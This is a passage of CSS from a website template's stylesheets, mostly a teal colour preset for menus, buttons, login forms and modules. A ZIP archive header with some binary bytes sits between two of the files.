  -webkit-border-radius: 4px;
  -moz-border-radius: 4px;
  border-radius: 4px;
}
.accordion-heading {
  border-bottom: 0;
}
.accordion-heading .accordion-toggle {
  display: block;
  padding: 8px 15px;
}
.accordion-toggle {
  cursor: pointer;
}
.accordion-inner {
  padding: 9px 15px;
  border-top: 1px solid #e5e5e5;
}
@media (max-width: 767px) {
  div.modal {
    position: fixed;
    top: 20px;
    left: 20px;
    right: 20px;
    width: auto;
    margin: 0;
  }
  div.modal.fade {
    top: -100px;
  }
  div.modal.fade.in {
    top: 20px;
  }
}
@media (max-width: 480px) {
  div.modal {
    top: 10px;
    left: 10px;
    right: 10px;
  }
}
PK!���{@�@�flex/css/presets/preset5.cssnu&1i�.major_color_bckg-100 {
  background-color: #16b99a;
}
.major_color_bckg-90 {
  background-color: rgba(22,185,154,0.9);
}
.major_color_bckg-80 {
  background-color: rgba(22,185,154,0.8);
}
.major_color_bckg-70 {
  background-color: rgba(22,185,154,0.7);
}
.major_color_bckg-60 {
  background-color: rgba(22,185,154,0.6);
}
.major_color_bckg-50 {
  background-color: rgba(22,185,154,0.5);
}
.major_color_bckg-40 {
  background-color: rgba(22,185,154,0.4);
}
.major_color_bckg-30 {
  background-color: rgba(22,185,154,0.3);
}
.major_color_bckg-20 {
  background-color: rgba(22,185,154,0.2);
}
.major_color_bckg-10 {
  background-color: rgba(22,185,154,0.1);
}
.black_bckg-90 {
  background-color: rgba(0,0,0,0.9);
}
.black_bckg-80 {
  background-color: rgba(0,0,0,0.8);
}
.black_bckg-70 {
  background-color: rgba(0,0,0,0.7);
}
.black_bckg-60 {
  background-color: rgba(0,0,0,0.6);
}
.black_bckg-50 {
  background-color: rgba(0,0,0,0.5);
}
.black_bckg-40 {
  background-color: rgba(0,0,0,0.4);
}
.black_bckg-30 {
  background-color: rgba(0,0,0,0.3);
}
.black_bckg-20 {
  background-color: rgba(0,0,0,0.2);
}
.black_bckg-10 {
  background-color: rgba(0,0,0,0.1);
}
.white_bckg-90 {
  background-color: rgba(255,255,255,0.9);
}
.white_bckg-80 {
  background-color: rgba(255,255,255,0.8);
}
.white_bckg-70 {
  background-color: rgba(255,255,255,0.7);
}
.white_bckg-60 {
  background-color: rgba(255,255,255,0.6);
}
.white_bckg-50 {
  background-color: rgba(255,255,255,0.5);
}
.white_bckg-40 {
  background-color: rgba(255,255,255,0.4);
}
.white_bckg-30 {
  background-color: rgba(255,255,255,0.3);
}
.white_bckg-20 {
  background-color: rgba(255,255,255,0.2);
}
.white_bckg-10 {
  background-color: rgba(255,255,255,0.1);
}
.black-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.5);
}
.black-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.4);
}
.black-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.3);
}
.black-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.2);
}
.black-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.1);
}
.white-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.5);
}
.white-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.4);
}
.white-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.3);
}
.white-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.2);
}
.white-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.1);
}
.major_color {
  color: #16b99a !important;
}
.white_color {
  color: #fff;
}
.text_color {
  color: #000000;
}
.major_color-lighten-10 {
  color: #1ee4be;
}
.major_color-lighten-20 {
  color: #4beacc;
}
.major_color-lighten-30 {
  color: #79efd9;
}
.gray-shadow-50 {
  box-shadow: 0 0 50px rgba(85,85,85,0.5);
}
.gray-shadow-40 {
  box-shadow: 0 0 40px rgba(128,128,128,0.4);
}
.gray-shadow-30 {
  box-shadow: 0 0 30px rgba(128,128,128,0.3);
}
.gray-shadow-20 {
  box-shadow: 0 0 20px rgba(128,128,128,0.3);
}
.gray-shadow-10 {
  box-shadow: 0 0 10px rgba(128,128,128,0.3);
}
.transparent {
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent li.active a {
  color: #16b99a;
  border-bottom: 2px solid #16b99a;
}
#sp-header.onepage .sp-megamenu-parent li.active:first-child >a.page-scroll {
  color: #16b99a;
  border-bottom: 2px solid #16b99a;
}
#sp-header.onepage .sp-megamenu-parent ul li a {
  border-bottom-width: 0px !important;
  border-right: 2px solid transparent;
  border-radius: 0 !important;
}
#sp-header.onepage .sp-megamenu-parent ul li a:hover {
  color: #16b99a;
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent ul li.active a {
  border-right: 2px solid #16b99a;
}
#sp-header #sp-menu .sp-megamenu-parent >li.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent >li.sp-has-child.active>a {
  color: #1ee4be;
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active:hover>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item a:hover {
  color: #fff;
  background-color: #16b99a;
  background-color: rgba(22,185,154,0.8);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a:hover {
  background: transparent !important;
  border-bottom: 1px solid rgba(0,0,0,0.15);
  box-shadow: 0 1px 0px rgba(250,250,250,0.15);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a:hover {
  background: transparent;
}
#sp-header .top-search-wrapper .searchwrapper {
  box-shadow: 0 0 0 6px rgba(22,185,154,0.5);
}
#sp-header #cart-menu {
  padding: 0;
}
#sp-header #cart-menu #cd-menu-trigger .empty_basket,
#sp-header #cart-menu #cd-menu-trigger .items-added,
#sp-header #cart-menu .cd-cart .empty_basket,
#sp-header #cart-menu .cd-cart .items-added {
  background-color: #16b99a;
}
#sp-header #cart-menu #cd-menu-trigger.menu-is-open >i,
#sp-header #cart-menu .cd-cart.menu-is-open >i {
  font-size: 30px;
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger >i,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart >i {
  background-color: rgba(51,51,51,0.75);
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger.menu-is-open .total_products,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart.menu-is-open .total_products {
  right: 27px;
  font-size: 11px;
  line-height: 18px;
  height: 18px;
  width: 18px;
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner {
  background: rgba(22,185,154,0.85);
}
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item.current-item>a,
#sp-header.color #sp-menu .sp-megamenu-parent .sp-dropdown .sp-dropdown-inner li.sp-menu-item a:hover {
  background-color: #0b5e4e;
  background-color: rgba(0,0,0,0.25);
}
.overflow-hidden {
  overflow-x: hidden;
}
.sp-module ul.accordion-menu > li .offcanvas-menu-toggler .close-icon {
  color: #16b99a;
}
.sp-module ul.accordion-menu li.current > a {
  color: #16b99a;
}
.nav.menu li.current > a {
  color: #16b99a;
}
.close-offcanvas:hover {
  border: 1px solid #16b99a;
  color: #16b99a;
}
.full-screen .offcanvas-menu,
.full-screen-off-canvas-ftop .offcanvas-menu {
  margin-bottom: 10vh;
}
.full-screen .offcanvas-menu .search input,
.full-screen-off-canvas-ftop .offcanvas-menu .search input {
  height: 44px;
}
.full-screen .offcanvas-menu .flex-search:before,
.full-screen-off-canvas-ftop .offcanvas-menu .flex-search:before {
  line-height: 44px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler {
  padding: 5px 15px;
  line-height: 18px;
}
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .open-icon,
.full-screen-off-canvas-ftop .offcanvas-menu ul li ul li.separator.deeper .offcanvas-menu-toggler .close-icon {
  font-size: 16px;
}
.slide-top-menu .offcanvas-menu {
  margin-bottom: 10vh;
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.slide-top-menu .offcanvas-menu .separator,
.slide-top-menu .offcanvas-menu .nav-header {
  color: #b3b3b3;
}
.new-look .offcanvas-menu {
  box-shadow: -1px 0 15px rgba(0,0,0,0.3);
}
.new-look .offcanvas-menu .sp-module ul >li .separator,
.new-look .offcanvas-menu .sp-module ul >li .nav-header {
  color: #999999;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:before {
  background: #16b99a none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler:after {
  background: #16b99a none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:before {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li .offcanvas-menu-toggler.collapsed:after {
  background: #eee none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:before {
  background: #16b99a none repeat scroll 0 0;
}
.new-look .offcanvas-menu .sp-module ul >li.active .offcanvas-menu-toggler:after {
  background: #16b99a none repeat scroll 0 0;
}
a {
  color: #16b99a;
}
a:hover {
  color: #118b74;
}
.article-info >dt >i,
.article-info >dt >span.fa,
.article-info >dd >i,
.article-info >dd >span.fa {
  color: #1ee4be;
}
.article-info >dt .voting-symbol span.star,
.article-info >dd .voting-symbol span.star {
  color: #1ee4be;
}
.article-info >dt .sp-rating span.star:hover:before,
.article-info >dt .sp-rating span.star:hover ~ span.star:before,
.article-info >dd .sp-rating span.star:hover:before,
.article-info >dd .sp-rating span.star:hover ~ span.star:before {
  color: #13a287;
}
.article-info >dt .ajax-loader:before,
.article-info >dd .ajax-loader:before {
  color: #118b74;
}
#offcanvas-toggler >i {
  color: #1ee4be;
}
#offcanvas-toggler >i:hover {
  color: #16b99a;
}
.sp-pre-loader {
  background: rgba(255,255,255,0.64);
}
.sp-pre-loader .sp-loader-clock {
  border: 3px solid #333333;
}
.sp-pre-loader .sp-loader-clock:after {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-clock:before {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-circle {
  border: 4px solid rgba(51,51,51,0.4);
}
.sp-pre-loader .sp-loader-circle:after {
  border-top-color: #333333;
}
.sp-pre-loader .loader-flip:after {
  background-color: rgba(51,51,51,0.8);
}
.sp-pre-loader .sp-loader-bubble-loop {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-bubble-loop:before {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .sp-loader-bubble-loop:after {
  background-color: rgba(51,51,51,0.5);
}
.sp-pre-loader .circle-two > span,
.sp-pre-loader .circle-two > span:before,
.sp-pre-loader .circle-two > span:after {
  border: 2px solid #333333;
}
.sp-pre-loader .wave-two li {
  background-color: #333333;
}
.sp-pre-loader .sp-loader-audio-wave {
  background: linear-gradient(#333333,#333333) 0 50%, linear-gradient(#333333,#333333) 0.625em 50%, linear-gradient(#333333,#333333) 1.25em 50%, linear-gradient(#333333,#333333) 1.875em 50%, linear-gradient(#333333,#333333) 2.5em 50%;
}
.sp-pre-loader .sp-loader-with-logo .line {
  background: #333333;
}
.btn-primary,
.button,
.btn-readmore,
.sppb-btn-primary,
.vm-button-correct {
  border-color: #15b092;
  background-color: #16b99a;
  background-color: rgba(22,185,154,0.9);
  color: #fff;
  outline: 0;
}
.btn-primary:hover,
.btn-primary:focus,
.button:hover,
.button:focus,
.btn-readmore:hover,
.btn-readmore:focus,
.sppb-btn-primary:hover,
.sppb-btn-primary:focus,
.vm-button-correct:hover,
.vm-button-correct:focus {
  border-color: #0e7561;
  background-color: #14a78b;
  color: #fff;
}
.btn-primary.sppb-btn-outline,
.button.sppb-btn-outline,
.btn-readmore.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-outline,
.vm-button-correct.sppb-btn-outline {
  border: 2px solid #16b99a;
  color: inherit;
  background-color: transparent;
}
.btn-primary.sppb-btn-round.focus,
.btn-primary.sppb-btn-round.active,
.btn-primary.sppb-btn-round:focus,
.btn-primary.sppb-btn-round:active,
.btn-primary.sppb-btn-outline:hover,
.btn-primary.sppb-btn-outline.focus,
.btn-primary.sppb-btn-outline.active,
.btn-primary.sppb-btn-outline:focus,
.btn-primary.sppb-btn-outline:active,
.btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.button.sppb-btn-round.focus,
.button.sppb-btn-round.active,
.button.sppb-btn-round:focus,
.button.sppb-btn-round:active,
.button.sppb-btn-outline:hover,
.button.sppb-btn-outline.focus,
.button.sppb-btn-outline.active,
.button.sppb-btn-outline:focus,
.button.sppb-btn-outline:active,
.button.open > .dropdown-toggle.sppb-btn-outline,
.btn-readmore.sppb-btn-round.focus,
.btn-readmore.sppb-btn-round.active,
.btn-readmore.sppb-btn-round:focus,
.btn-readmore.sppb-btn-round:active,
.btn-readmore.sppb-btn-outline:hover,
.btn-readmore.sppb-btn-outline.focus,
.btn-readmore.sppb-btn-outline.active,
.btn-readmore.sppb-btn-outline:focus,
.btn-readmore.sppb-btn-outline:active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-primary.sppb-btn-round.focus,
.sppb-btn-primary.sppb-btn-round.active,
.sppb-btn-primary.sppb-btn-round:focus,
.sppb-btn-primary.sppb-btn-round:active,
.sppb-btn-primary.sppb-btn-outline:hover,
.sppb-btn-primary.sppb-btn-outline.focus,
.sppb-btn-primary.sppb-btn-outline.active,
.sppb-btn-primary.sppb-btn-outline:focus,
.sppb-btn-primary.sppb-btn-outline:active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-outline,
.vm-button-correct.sppb-btn-round.focus,
.vm-button-correct.sppb-btn-round.active,
.vm-button-correct.sppb-btn-round:focus,
.vm-button-correct.sppb-btn-round:active,
.vm-button-correct.sppb-btn-outline:hover,
.vm-button-correct.sppb-btn-outline.focus,
.vm-button-correct.sppb-btn-outline.active,
.vm-button-correct.sppb-btn-outline:focus,
.vm-button-correct.sppb-btn-outline:active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-outline {
  background-color: rgba(22,185,154,0.9) !important;
  border-color: rgba(0,0,0,0.2) !important;
  color: #fff;
  outline: 0;
}
.btn-primary.sppb-btn-3d,
.button.sppb-btn-3d,
.btn-readmore.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d {
  border-bottom-color: rgba(0,0,0,0.25);
}
.btn-primary.sppb-btn-3d:hover,
.btn-primary.sppb-btn-3d:focus,
.button.sppb-btn-3d:hover,
.button.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d:hover,
.btn-readmore.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d:hover,
.sppb-btn-primary.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d:hover,
.vm-button-correct.sppb-btn-3d:focus {
  background: rgba(22,185,154,0.95);
  border-bottom-color: rgba(0,0,0,0.3);
}
.btn-primary.sppb-btn-3d:focus,
.btn-primary.sppb-btn-3d.focus,
.btn-primary.sppb-btn-3d:active,
.btn-primary.sppb-btn-3d.active,
.btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.button.sppb-btn-3d:focus,
.button.sppb-btn-3d.focus,
.button.sppb-btn-3d:active,
.button.sppb-btn-3d.active,
.button.open > .dropdown-toggle.sppb-btn-3d,
.btn-readmore.sppb-btn-3d:focus,
.btn-readmore.sppb-btn-3d.focus,
.btn-readmore.sppb-btn-3d:active,
.btn-readmore.sppb-btn-3d.active,
.btn-readmore.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-primary.sppb-btn-3d:focus,
.sppb-btn-primary.sppb-btn-3d.focus,
.sppb-btn-primary.sppb-btn-3d:active,
.sppb-btn-primary.sppb-btn-3d.active,
.sppb-btn-primary.open > .dropdown-toggle.sppb-btn-3d,
.vm-button-correct.sppb-btn-3d:focus,
.vm-button-correct.sppb-btn-3d.focus,
.vm-button-correct.sppb-btn-3d:active,
.vm-button-correct.sppb-btn-3d.active,
.vm-button-correct.open > .dropdown-toggle.sppb-btn-3d {
  background: #19d0ad;
}
.sppb-btn-default,
.btn.sppb-btn-default {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.sppb-btn-default:hover,
.sppb-btn-default:focus,
.btn.sppb-btn-default:hover,
.btn.sppb-btn-default:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #16b99a;
  color: #16b99a;
}
.sppb-btn-default.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline {
  border: 2px solid #666666;
  color: inherit;
  background-color: transparent;
}
.sppb-btn-default.sppb-btn-outline:hover,
.sppb-btn-default.sppb-btn-outline.focus,
.sppb-btn-default.sppb-btn-outline.active,
.sppb-btn-default.sppb-btn-outline:focus,
.sppb-btn-default.sppb-btn-outline:active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline,
.btn.sppb-btn-default.sppb-btn-outline:hover,
.btn.sppb-btn-default.sppb-btn-outline.focus,
.btn.sppb-btn-default.sppb-btn-outline.active,
.btn.sppb-btn-default.sppb-btn-outline:focus,
.btn.sppb-btn-default.sppb-btn-outline:active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-outline {
  background-color: transparent !important;
  color: #118b74;
  border: 2px solid #16b99a !important;
  box-shadow: none;
}
.sppb-btn-default.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d {
  border-bottom-color: #666666;
}
.sppb-btn-default.sppb-btn-3d:hover,
.sppb-btn-default.sppb-btn-3d:focus,
.btn.sppb-btn-default.sppb-btn-3d:hover,
.btn.sppb-btn-default.sppb-btn-3d:focus {
  background-color: transparent;
  color: #118b74;
  border-bottom-color: #16b99a;
}
.sppb-btn-default.sppb-btn-3d:active,
.sppb-btn-default.sppb-btn-3d.active,
.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d,
.btn.sppb-btn-default.sppb-btn-3d:active,
.btn.sppb-btn-default.sppb-btn-3d.active,
.btn.sppb-btn-default.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom: 2px solid #16b99a;
  background-color: transparent;
}
.btn-link,
.sppb-btn-link {
  color: #1ee4be;
}
.btn-link:hover,
.btn-link:focus,
.sppb-btn-link:hover,
.sppb-btn-link:focus {
  color: #16b99a;
  text-decoration: none;
}
.btn-readmore {
  color: #fff;
}
.btn-readmore:hover,
.btn-readmore:focus {
  color: #fff;
}
.btn-dark,
.sppb-btn-dark {
  color: #fff;
  border-color: #4d4d4d;
  background-color: rgba(51,51,51,0.72);
}
.btn-dark:hover,
.btn-dark:focus,
.sppb-btn-dark:hover,
.sppb-btn-dark:focus {
  color: #eee;
  border-color: #333;
  background-color: #424242;
  background-color: rgba(51,51,51,0.87);
}
.btn-dark.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline {
  border-color: #333;
}
.btn-dark.sppb-btn-outline:hover,
.btn-dark.sppb-btn-outline.focus,
.btn-dark.sppb-btn-outline.active,
.btn-dark.sppb-btn-outline:focus,
.btn-dark.sppb-btn-outline:active,
.btn-dark.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline:hover,
.sppb-btn-dark.sppb-btn-outline.focus,
.sppb-btn-dark.sppb-btn-outline.active,
.sppb-btn-dark.sppb-btn-outline:focus,
.sppb-btn-dark.sppb-btn-outline:active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-outline {
  color: #eee;
  border-color: #333;
  background-color: #535353;
  background-color: rgba(51,51,51,0.8);
}
.btn-dark.sppb-btn-3d,
.btn-dark.sppb-btn-3d:hover,
.btn-dark.sppb-btn-3d.focus,
.btn-dark.sppb-btn-3d:focus,
.btn-dark.sppb-btn-3d:active,
.btn-dark.sppb-btn-3d.active,
.btn-dark.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d:hover,
.sppb-btn-dark.sppb-btn-3d.focus,
.sppb-btn-dark.sppb-btn-3d:focus,
.sppb-btn-dark.sppb-btn-3d:active,
.sppb-btn-dark.sppb-btn-3d.active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #262626;
}
.btn-light,
.sppb-btn-light {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
  background-color: rgba(255,255,255,0.05);
}
.btn-light:hover,
.btn-light:focus,
.sppb-btn-light:hover,
.sppb-btn-light:focus {
  border-color: #fff;
  color: #fff;
  background-color: rgba(255,255,255,0.15);
}
.btn-light.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-outline:hover,
.btn-light.sppb-btn-outline.focus,
.btn-light.sppb-btn-outline:focus,
.btn-light.sppb-btn-outline:active,
.btn-light.sppb-btn-outline.active,
.btn-light.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline:hover,
.sppb-btn-light.sppb-btn-outline.focus,
.sppb-btn-light.sppb-btn-outline:focus,
.sppb-btn-light.sppb-btn-outline:active,
.sppb-btn-light.sppb-btn-outline.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #fff;
  color: #fff;
}
.btn-light.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d {
  border-bottom-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-3d:hover,
.btn-light.sppb-btn-3d.focus,
.btn-light.sppb-btn-3d:focus,
.btn-light.sppb-btn-3d:active,
.btn-light.sppb-btn-3d.active,
.btn-light.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d:hover,
.sppb-btn-light.sppb-btn-3d.focus,
.sppb-btn-light.sppb-btn-3d:focus,
.sppb-btn-light.sppb-btn-3d:active,
.sppb-btn-light.sppb-btn-3d.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #fff;
}
.btn-flex,
.sppb-btn-flex {
  color: #fff;
  border-color: #4beacc;
  background-color: rgba(255,255,255,0.25);
  box-shadow: 0 2px 5px rgba(0,0,0,0.15);
}
.btn-flex:hover,
.btn-flex:focus,
.sppb-btn-flex:hover,
.sppb-btn-flex:focus {
  border-color: #35e7c5;
  color: #fff;
  background-color: rgba(22,185,154,0.7);
}
.btn-flex.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline {
  color: #fff;
  border-color: #4beacc;
  background-color: rgba(255,255,255,0.25);
}
.btn-flex.sppb-btn-outline:hover,
.btn-flex.sppb-btn-outline.focus,
.btn-flex.sppb-btn-outline:focus,
.btn-flex.sppb-btn-outline:active,
.btn-flex.sppb-btn-outline.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline:hover,
.sppb-btn-flex.sppb-btn-outline.focus,
.sppb-btn-flex.sppb-btn-outline:focus,
.sppb-btn-flex.sppb-btn-outline:active,
.sppb-btn-flex.sppb-btn-outline.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #35e7c5;
  color: #fff;
  background-color: rgba(22,185,154,0.7);
}
.btn-flex.sppb-btn-3d,
.btn-flex.sppb-btn-3d:hover,
.btn-flex.sppb-btn-3d.focus,
.btn-flex.sppb-btn-3d:focus,
.btn-flex.sppb-btn-3d:active,
.btn-flex.sppb-btn-3d.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d:hover,
.sppb-btn-flex.sppb-btn-3d.focus,
.sppb-btn-flex.sppb-btn-3d:focus,
.sppb-btn-flex.sppb-btn-3d:active,
.sppb-btn-flex.sppb-btn-3d.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #1ee4be;
}
.light >i {
  color: #62ecd2;
}
.light:hover i {
  color: #79efd9;
}
ul.social-icons >li a:hover,
ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #79efd9;
}
.login .title i.pe,
.registration .title i.pe {
  color: #4beacc;
}
.ap-login a i.pe,
.ap-signin a i.pe {
  color: #4beacc;
}
.ap-modal-login .modal-dialog {
  color: #000000;
}
.ap-modal-login .title i.pe {
  color: #4beacc;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a {
  color: #000000 !important;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a:hover {
  color: #16b99a !important;
}
.ap-modal-login .modal-content .modal-footer a:hover {
  color: #16b99a !important;
}
.view-profile .select-menu select {
  display: block;
}
.view-profile button:focus {
  outline: none;
}
.view-profile a[title="Cancel"] {
  background-color: #888888;
  color: #fff;
}
.view-profile a[title="Cancel"]:hover {
  background-color: #6f6f6f;
}
.ap-my-account-menu .signin-img-wrap i.pe {
  color: #79efd9;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a {
  color: #000000 !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover {
  background-color: rgba(22,185,154,0.8);
  color: #fff !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover::before {
  color: #79efd9;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a {
  color: #16b99a;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover {
  background-color: rgba(22,185,154,0.8);
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover i {
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a i {
  color: #16b99a;
}
.ap-my-account-menu .dropdown-menu ul.menu >li.active > a {
  background-color: rgba(22,185,154,0.8);
  color: #fff !important;
}
.login-wrapper >i.pe,
.registration-wrapper >i.pe,
.reset-wrapper >i.pe,
.remind-wrapper >i.pe {
  color: rgba(22,185,154,0.07);
}
.login-wrapper >i.pe {
  color: rgba(85,85,85,0.02);
}
#sp-top-bar ul.social-icons >li a:hover,
#sp-top-bar ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #19d0ad;
}
#sp-top-bar.onepage {
  box-shadow: inset 0 1px 0px rgba(0,0,0,0.05), inset 0 -1px 0px rgba(0,0,0,0.1);
}
#sp-top-bar.onepage .sp-contact-info li i {
  color: #0f826c;
}
#sp-top-bar.onepage .ap-login a i.pe,
#sp-top-bar.onepage .ap-signin a i.pe {
  color: #0f826c;
}
.sp-contact-info li a:hover {
  color: #35e7c5;
}
.sp-contact-info li i {
  color: #35e7c5;
}
.sp-module-content .mod-languages ul.lang-block li.lang-active a i {
  color: #4beacc;
}
ol.breadcrumb li a:hover {
  color: #62ecd2;
}
.sp-module ul >li >a,
.sppb-addon-module ul >li >a {
  color: #1a1a1a;
}
.sp-module ul >li >a:hover,
.sppb-addon-module ul >li >a:hover {
  color: #16b99a;
}
.sp-module.white .sppb-addon-content ol >span,
.sppb-addon-module.white .sppb-addon-content ol >span {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li,
.sppb-addon-module.white .sppb-addon-content ol li {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li a,
.sppb-addon-module.white .sppb-addon-content ol li a {
  color: #fff;
}
.sp-module.white .sppb-addon-content ol li a:hover,
.sppb-addon-module.white .sppb-addon-content ol li a:hover {
  color: #62ecd2;
}
.sp-module.dark ul >li >span >a,
.sppb-addon-module.dark ul >li >span >a {
  color: #19d0ad;
}
.sp-module.dark ul >li >span >a:hover,
.sppb-addon-module.dark ul >li >span >a:hover {
  color: #4beacc;
}
.sp-module.dark ul >li >a,
.sppb-addon-module.dark ul >li >a {
  color: #1ee4be !important;
}
.sp-module.dark ul >li >a:hover,
.sppb-addon-module.dark ul >li >a:hover {
  color: #62ecd2 !important;
}
.sp-module .latestnews >div >a,
.sppb-addon-module .latestnews >div >a {
  color: #000000;
}
.sp-module .latestnews >div >a:hover,
.sppb-addon-module .latestnews >div >a:hover {
  color: #16b99a;
}
.sp-module ul.category-module >li >a,
.sp-module .relateditems >li >a,
.sppb-addon-module ul.category-module >li >a,
.sppb-addon-module .relateditems >li >a {
  color: #1ee4be;
}
.sp-module ul.category-module >li >a >div.related-date,
.sp-module .relateditems >li >a >div.related-date,
.sppb-addon-module ul.category-module >li >a >div.related-date,
.sppb-addon-module .relateditems >li >a >div.related-date {
  color: #999999;
}
.sp-module ul.category-module >li >a >div.related-date >i,
.sp-module .relateditems >li >a >div.related-date >i,
.sppb-addon-module ul.category-module >li >a >div.related-date >i,
.sppb-addon-module .relateditems >li >a >div.related-date >i {
  color: #4beacc;
}
.sp-module ul.category-module >li span,
.sp-module ul.category-module >li p,
.sp-module .relateditems >li span,
.sp-module .relateditems >li p,
.sppb-addon-module ul.category-module >li span,
.sppb-addon-module ul.category-module >li p,
